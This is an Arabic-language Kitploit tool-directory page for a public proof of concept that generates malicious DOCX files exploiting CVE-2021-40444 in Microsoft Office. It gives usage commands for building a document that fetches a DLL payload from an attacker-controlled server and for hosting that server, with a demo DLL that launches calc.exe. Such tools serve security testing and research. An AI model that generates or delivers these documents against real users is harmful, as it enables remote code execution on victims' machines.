Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/lockedbyte/cve-2021-40444
توليد الحمولةالاستغلالاستغلال تطبيقات الويبتحليل البرمجيات الخبيثة
GitHublockedbyte/cve-2021-40444

CVE-2021-40444

يُولّد مستندات DOCX ضارة تستغل CVE-2021-40444 (ثغرة تنفيذ الأوامر عن بُعد في Microsoft Office) مع خادم مستضاف لتسليم حمولة DLL، استنادًا إلى عينات محلّلة عكسيًا من البرية.

عرض المستودع
1.8k475منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم CVE-2021-40444

مولد مستندات docx خبيثة لاستغلال الثغرة CVE-2021-40444 (تنفيذ الأوامر عن بُعد في Microsoft Office Word)

تم إنشاء هذا السكريبت بناءً على بعض الهندسة العكسية للعينة المستخدمة في الهجمات الفعلية: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (ملف docx)

تحتاج إلى تثبيت lcab أولاً (sudo apt-get install lcab)

اطلع على REPRODUCE.md لخطوات إعادة الإنتاج اليدوية

إذا لم يعمل ملف cab المُنشأ، جرب توجيه رابط exploit.html إلى calc.cab

الاستخدام

أولاً، قم بتوليد مستند docx خبيث باستخدام DLL، يمكنك استخدام الملف الموجود في test/calc.dll والذي يقوم فقط بتشغيل calc.exe عبر استدعاء system()

python3 exploit.py generate test/calc.dll http://<SRV IP>

Document generation

بعد توليد مستند docx الخبيث (سيكون في out/) يمكنك إعداد الخادم:

sudo python3 exploit.py host 80

Server

أخيرًا، جرب المستند في جهاز افتراضي يعمل بنظام Windows:

Pop Calc

تنزيل الأداة